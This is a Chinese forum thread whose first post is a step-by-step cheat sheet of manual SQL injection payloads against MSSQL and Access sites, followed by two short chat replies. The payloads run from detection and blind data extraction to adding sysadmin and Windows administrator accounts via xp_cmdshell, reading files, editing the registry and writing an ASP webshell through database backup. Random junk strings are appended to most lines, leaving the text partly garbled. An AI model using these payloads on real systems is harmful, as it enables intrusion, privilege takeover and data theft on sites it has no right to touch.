社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4398阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 $iA:3DM07  
  2.初步判断是否是mssql ;and user>0 "?FBbJ  
" BLJh)i  
  3.注入参数是字符'and [查询条件] and ''=' NbCIL8f]  
KTAQ6k  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' 2 zG;91^  
 =WEDQ\ c  
  5.判断数据库系统 K4I/a#S'@6  
2L51 H(  
  ;and (select count(*) from sysobjects)>0 mssql I1s$\NZ~]  
yS3or(K  
  ;and (select count(*) from msysobjects)>0 access #\O'*mz  
h##U=`x3  
n</Rd=  
c>Ri6=C  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 =Lnip<t>ja  
sM%l:Fv  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 7Jz 9%iP  
2 gca *  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 DbtkWq%  
6\ .LG4@LO  
  9.(1)猜字段的ascii值(access) i9`-a/  
$Il  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 :@@m'zF<;  
L>0Pur)[  
  (2)猜字段的ascii值(mssql) \((5Sd  
B@ ms Gb C  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ?ef7%0  
yf-2E_yB  
  10.测试权限结构(mssql) h`(VMf'#  
s0 Z)BR #  
}r;=<mc,O  
YN7`18u  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- )h{+pK  
x|()f 3{.  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- tZFpxyF  
'Asr,[]?  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- @xBO[v  
yL -}E  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- O`aNNy  
Q ;5A~n  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 6#\:J0  
u1d%wOY  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #B#xSmak  
2uV5hSHYe  
  ;and 1=(select IS_MEMBER('db_owner'));-- w@n}DCFt  
EB6X Yr  
7@m+ y  
_A0X[}^K  
  11.添加mssql和系统的帐户 )_?h;wh 84  
.M ID)PY-  
  ;exec master.dbo.sp_addlogin username;-- 7#7|+%W0  
  ;exec master.dbo.sp_password null,username,password;-- rp2g./2  
IYH4@v/#  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 5g$>J)Ry  
1'8-+?r  
  ;exec master.dbo.xp_cmdshell 'net user username password mgM"u94-]  
oTcf[<   
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- EWv[Sp  
|WfL'_?$  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- <=w!:   
!4 lN[  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- kg,\l9AM  
u,N<U t  
&] xtx>qg<  
)r)ZmS5O  
  12.(1)遍历目录 Gvvw:]WgF  
,|,kU0xXz  
  ;create table dirs(paths varchar(100), id int) ^L8:..+:  
Kltqe5  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' Wt=@6w&  
'C#[iRG4  
  ;and (select top 1 paths from dirs)>0 k2PK4Ua_}q  
\'iy(8i  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ]!a?Lr  
9wO2`e )  
5r~hs6H  
v (S h+p  
  (2)遍历目录 $H]NC-\+>  
n.R"n9v`  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- cRNVqMpg  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 8pp;" "b  
KGI <G  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 V7O7"Q^q  
:Gx5vo  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 n[# **s  
7VWy1  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ra_v+HR7  
j'hWhLax  
%T\ 2.vl  
J8Vzf$t};  
  13.mssql中的存储过程 Gi2Fjq/Y  
*Tr{a_{~C  
  xp_regenumvalues 注册表根键, 子键 ?8U]UM6Tu4  
OjqT5<U  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 6\-u:dvGI?  
Dk8@x8  
  xp_regread 根键,子键,键值名 !- 5z 1b)  
?I"?J/zm  
  ;exec xp_regread Mm9*$g!R  
XV`8Vb  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ;d]vAj  
yF|+oTp  
  xp_regwrite 根键,子键, 值名, 值类型, 值 Fdq5:v?k  
!C^>tmqS  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 IR;3{o  
oEj$xm_}  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 x-4d VKE*z  
U)Tl<l<  
  xp_regdeletevalue 根键,子键,值名 vz1I/IdTd  
+Z"[2Dm  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 eX!yIqAR  
Ae"|a_>fMI  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 #uICH t3  
JeA_mtSQ|  
~C3Ada@4  
3*(><<ZC  
  14.mssql的backup创建webshell @e$EwCV,  
jR@>~t[}o  
  use model }1lZW"{e[  
o#BI_#b  
  create table cmd(str image); ?U1Nm~'UZ  
:hR^?{9Z4>  
  insert into cmd(str) values (''); NX:\iJD)1U  
xj3{Ke`6  
  backup database model to disk='c:\l.asp'; FT J{  
p1mAoVxR  
>RpMw!NT  
k72NXagh  
  15.mssql内置函数 /V#? d  
+V[;DOlll  
  ;and (select @@version)>0 获得Windows的版本号 -pQ?ybQ  
-C!m#"PDW  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa giW9b_  
5l%g3F  
  ;and (select user_name())>0 爆当前系统的连接用户 }Gx@1)??  
D>Rlm,U  
  ;and (select db_name())>0 得到当前连接的数据库 '- #QK'p  
G-sQL'L[U  
%mzDmrzq  
NGO?K?  
  16.简洁的webshell nHp$5|r<  
XJ"xMv  
  use model %P(2uesd  
Py/~Q-8p  
  create table cmd(str image); Q]VG6x  
i<=2 L?[.I  
  insert into cmd(str) values (''); j7NOYm5N  
Z J1@z.  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
温馨提示:欢迎交流讨论,请勿纯表情、纯引用!
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八